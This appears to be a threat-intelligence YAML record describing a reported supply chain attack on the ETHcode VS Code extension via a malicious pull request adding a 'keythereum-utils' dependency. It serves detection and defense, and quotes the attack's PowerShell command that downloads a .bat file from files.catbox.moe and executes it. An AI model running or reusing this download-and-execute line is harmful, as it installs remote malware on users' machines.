description: ReversingLabs researchers identified a supply chain attack on the ETHcode
  VS Code extension via a GitHub pull request that introduced malicious dependencies.
attribution: Airez299 (suspected threat actor)
malware_families:
- keythereum-utils
TTPs:
  processes:
  - powershell.exe
  commandline:
  - powershell.exe -Command "& { $o=\\"$env:TEMP\\\\1.cmd\\"; & curl.exe k -L -Ss
    \\"https://files.catbox.moe/nucifz.bat\\" o $o; & $o }"
  powershell:
  - '& { $o=\\"$env:TEMP\\\\1.cmd\\"; & curl.exe k -L -Ss \\"https://files.catbox.moe/nucifz.bat\\"
    o $o; & $o }'
  scripting_engine:
  - JavaScript Obfuscator
  registry_keys: []
  image_load: []
  network_connections:
  - executable: powershell.exe
    destination_address: https://files.catbox.moe/nucifz.bat
    port: ''
  file_activity:
  - full_path: $env:TEMP\\1.cmd
  persistence: []
  pipes: []
  process_relations: []
IOCs:
  domains:
  - files.catbox.moe
authors:
- Petar Kirhmajer
reference: https://www.reversinglabs.com/blog/malicious-pull-request-infects-vscode-extension
date_of_publication: July 08, 2025
file_creation_date: July 09, 2025
